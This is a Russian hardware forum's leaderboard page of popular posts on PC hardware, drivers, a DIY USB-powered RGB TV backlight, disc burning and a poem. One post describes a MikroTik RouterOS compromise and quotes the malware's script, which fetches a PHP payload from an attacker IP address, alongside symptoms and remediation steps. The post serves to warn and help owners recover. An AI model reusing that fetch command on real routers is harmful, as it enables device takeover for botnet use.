Jump to content
СофтФорум - всё о компьютерах и не только

Leaderboard


Popular Content

Showing content with the highest reputation since 12/05/18 in all areas

  1. 1 point
    + Текстовый файл с требованием выкупа тоже прикрепите к следующему сообщению.
  2. 1 point
    Знаете, граждане... Лично я - пока прекрасно себя чувствую на AM3+ сокете, четырёхголовом камне и видюшкой HD7870. Последняя Metro: Exodus нормально работает на примерно 45-57 FPS, чего более чем достаточно. Да, настройки - Medium, но лично меня - больше интересует игра как таковая, а не пальцегнутие по поводу настроек... Не, кто б мне денег поболе дал - я бы и Штеуд'а последнего взял, али Райзена... Но - хватает головы просто всё нормально настроить, исходя из имеющегося. То бишь, как по мне - лучше за терпимые деньги взять годовой давности ТОП, который ещё лет пять будет хорош, нежели за большие бабки брать сейчас полутоп, который что ныне середняк, что потом - ещё того хуже...
  3. 1 point
    Судя по скриншоту система видит только цифровой вывод звука (через HDMI). Попробуйте в диспетчере устройств для "Устройства с поддержкой High Definition Audio" посмотреть другие доступные совместимые драйверы (там иногда системой предлагается несколько вариантов). Если ничего подходящего нет, создайте точку восстановления системы и попробуйте подсунуть в диспетчере устройств для этого устройства драйвер от Windows 7 (той же разрядности, разумеется).
  4. 1 point
    Спасибо. Взаимно всем всего самого нилучшего ** Когда идёт не по прямой, А вечные кривые. Тогда проблемы с головой, Ни раз не бытовые. А если вечно прямо, то – Лечиться нужно срочно. Могу поспорить – рупь за сто. Ты сумасшедший точно. Равны, что гений, идиот – Болезнь (тут на латыни). Нормальным будет только тот, Кто где-то в середине. ***
  5. 1 point
    Загрузка за 5 секунд? На м2 винтах вообще все летает. Хорошие агрегаты, правда дорогие, зараза... Но к лету будет сильный обвал цен (прядка 30-40%) на чипы памяти (технологии развиваются, и переход на новый процесс производства принес свои положительные плоды), вместе с ними упадут цены на всю ссд продукцию. Обычные модули памяти тоже упадут в цене, правда не так сильно.
  6. 1 point
    Надеюсь планки идентичны. 1) Проверь батарейку для BIOS. 2) Выставить тайминги для планок памяти принудительно. Для спокойствия прогони memtest. глянь. не просел ли Блок питания... . Также и конденсаторы на матери.
  7. 1 point
    Немного возвращаюсь к задней (фоновой) подсветке для телевизоров (и мониторов). Всё что тут описано НЕ является Ambilight, то есть никак не не связано ни с изображением на экране телевизора (монитора), ни с его звуковым сопровождением. Применяется такая подсветка для уменьшения нагрузки на глаза, при просмотре телевизора в темноте. Я уже делал заднюю подсветку для телевизора на основе т.н. лампы настроения на трёх мультивибраторах. Работало это всё вполне сносно, но питание шло от БП на 12 вольт, который требовалось включать и выключать отдельно от телевизора. Да и эффект был всего один, хотя и непредсказуемый. Решил пойти по другому пути, а именно питание подсветки взять от USB порта телевизора. Теперь пожалуй на всех, даже самых простых и дешевых телевизорах имеется хотя бы один такой порт. Таким образом подсветка включается и выключается одновременно с телевизором. Скажу сразу - я тут ничего не изобрёл, тема эта уже давно находится что называется "в разработке". В продаже имеются RGB светодиодные ленты с питанием 5 вольт, похоже специально предназначенные для питания от USB. А так же специальные контроллеры, как с пультом ДУ, так и без него, с управлением от кнопок на самом контроллере, так же способные работать от 5 вольт. Так же есть различные прочие приблуды - коннекторы, переходники, различные удлинители, и т.п.. Контроллер в любом случае "одним концом" подключается к USB, а другим - к RGB ленте. Для начала купил полный комплект из светодиодных лент, различных удлинителей и коннекторов, и RGB контроллера с пультом дистанционного управления. Выглядит такой контроллер так: Испытания показали что работает это всё не очень надежно. Хотя имелись и положительные отзывы, возможно мне не повезло, или я что-то не так сделал. Работало это всё неустойчиво, то работает, то нет. Дальность действия пульта не особо большая. Контроллер будучи подключен к телевизору не запускался при его включении, надо было "передернуть" шнур USB. Вероятно дело в каких-то помехах по питанию, мне по крайней мере так показалось. По некоторым сведениям пульт от этого контроллера мешает телевизору, который так же реагирует на сигналы этого пульта. Хотя я сам это не наблюдал. Потому эти контроллеры с пультами были отложены в долгий ящик. Но ленты остались, как и разные прочие коннекторы и удлинители, потому был куплен контроллер без пульта. Выглядят они похоже, только на них имеются кнопки: Этот контроллер показал более надежную работу, по крайней мере кнопок слушается четко, установленные настройки сохраняются и после отключения питания. Что он может, и для чего все эти кнопки тут описывать не буду, одно могу сказать, - имеется много разных эффектов, которыми я пользоваться конечно не буду. В разных телевизорах могут быть разные порты, рассчитанные на разные токи. В моем телевизоре два USB порта. Один для флешек, выдает до 500 mA, и более мощный порт для жестких дисков выдает ток до 1А. Конечно могут быть и иные варианты, тут надо разобраться конкретно со своим телевизором, какие у него есть порты, и не превышать ток порта. Установить ток мы сможем только подбирая длину ленты. Потому если есть сомнения, желательно сначала подключить контроллер с лентой не к телевизору или компьютеру, а какому-то блоку питания с USB портом через USB-тестер, или амперметр (мультиметр), установить на контроллере белый свет (т.е. зажечь все три канала с максимальной яркостью), и подбором длины ленты установить допустимый для того или иного порта ток. Так у меня используется всего два куска ленты, горизонтально, сверху и снизу телевизора, каждая по 52 см. (Минимальный кусочек - 3,5 см). В максимальном режиме они потребляют 650 mA, потому включены в более мощный порт. Обычно ленты наклеивают сзади на сам телевизор по периметру вблизи краев. Но так делать совсем не обязательно, ленту можно разместить и за телевизором, например на стене, изнутри ниши мебельной стенки, или на каком-то другом предмете. Но таким образом, что бы был виден свет от ленты падающий на окружающие предметы, но не сама лента. Насчет цвета и различных эффектов (чисто моё мнение). Всевозможные мигания и вспышки, столь любимые китайцами, использовать крайне нежелательно. Если зритель не китаец, то повторяющийся эффект быстро надоест и вызовет раздражение и глаз и нервов. Вообще лучше использовать белый, или какой-то очень слабо насыщенный светлый цвет вроде желтого, яркостью примерно такой же как яркость экрана. Использование ярких и насыщенных цветов может привести к искажению цветовосприятия и неприятным ощущениям. Слабо насыщенный цвет, то есть слегка подкрашенный белый при помощи RGB ленты получить довольно трудно, тут лучше использовать RGBW ленту, о которой уже говорилось в этой теме. Возможно вскорости займусь чем-то подобным, с 12-вольтовой RGBW лентой, поскольку их есть у меня... пять метров. Включаться и выключаться это всё будет автоматически вместе с телевизором. Ну и как это всё реализовано у меня: Контроллер у меня не закреплен сзади, а болтается на проводах снизу: Для удобного доступа, что бы если что-то захочется поменять не лазить за телевизор. Остальное я или подписал, или так понятно. При сборке использовались только покупные узлы, пайка не применялась. Ленты закреплены на двусторонний скотч описанный в предыдущем посте.
  8. 1 point
    Не люблю круглые цифры
  9. 1 point
    А то! :) Привет! Давненько тебя не видно было. Как дела? Новый год с елкой будешь отмечать?
  10. 1 point
    23 апреля 2018 года обнаружена уязвимость всех продуктов микротик на RouterOS. Причем уязвимость позволяет узнать логин и пароль, беспрепятственно войти в систему и сделать с роутером всё что угодно. Всё бы было настолько буднично если бы 24 июля я не обнаружил бы на своем роутере и роутерах компании эту заразу. Распространяется очень быстро. Характерные приметы: В System - scripts появляются посторонние скрипты, вот один из них: /tool fetch address=95.154.216.164 port=2008 src-path=/mikrotik.php mode=http В файлах соответственно mikrotik.php Отключаются все запрещающие правила фаервола. Создаются задачи в планировщике по запуску скрипта. Открывается сокс-прокси на нестандартном порту. Меняются адреса днс-серверов. Т.е. микротик готовится к участию к какой-нибудь ддос-атаке или иным задачам по команде с сервака. Самый оптимальный вариант - обновить прошивку микротика до RouterOS 6.40.8 [bugfix] or 6.42.1 [current] и откатиться из бекапа. Если бекапа нет, но есть базовые познания то возможно выполнить команду export file=config_backup.rsc и уже на компьютере открыв в блокноте этот файл спокойно повыпиливать лишние строки. Сбросить роутер на заводские настройки и импортировать уже подрихтованный файл конфигурации. Ну пару советов по безопасности: IP - Services отключить все неиспользуемые сервисы. Для используемых жестко задать IP-адреса с которых они доступны. При желании сменить порты на нестандартные. Грамотно настроить фаерволл. В случае если факт взлома был зафиксирован - сменить пароль на микротик. Подробнее здесь https://forum.mikrotik.com/viewtopic.php?t=133533
  11. 1 point
    OVERLORD, в любом ПО для записи дисков есть опция "Запись из образа". При этом в программе обычно предлагается указать тот самый ISO-файл, из которого будет записываться диск. Простая запись ISO-файла на диск ничего не даст. ISO-файл представляет собой, грубо говоря, архив, внутри которого, помимо пользовательских файлов, есть ещё различные служебные участки, куда как раз таки записывается загрузчик Windows, который потом запускается при загрузке с болванки.
This leaderboard is set to Moscow/GMT+03:00


×
×
  • Create New...